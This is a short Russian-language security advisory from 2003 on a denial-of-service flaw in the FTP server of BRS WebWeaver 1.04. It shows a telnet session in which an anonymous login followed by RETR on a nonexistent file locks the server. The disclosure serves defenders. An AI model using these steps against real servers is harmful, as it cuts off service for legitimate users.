Security Lab

DoS против FTP сервера в BRS WebWeaver

Дата публикации:02.05.2003
Всего просмотров:1133
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Уязвимость обнаружена в BRS WebWeaver. Удаленный авторизованный пользователь, включая анонимного пользователя, может заблокировать работу FTP сервера.

Уязвимость происходит при попытке обращения к несуществующему объекту при помощи команды RETR. Пример:

e@some_box$ telnet hostname 21
220 BRS WebWeaver FTP Server ready.
USER anonymous
331 Password required for anonymous.
PASS user@host
230 User anonymous logged in.  
RETR blah         
150 Opening data connection for blah.
Затем, закрываем telnet сеанс с webweave'ом и пытаемся подключиться к серверу при помощи программы ftp.
e@some_box$ ftp hostname
Connection with hostname
Это все. Сервер заблокирован. Никто не сможет зайти на ftp сервер.

Уязвимость обнаружена в BRS WebWeaver 1.04

Ссылки: BRS WebWeaver: Блокирование Ftpd при помощи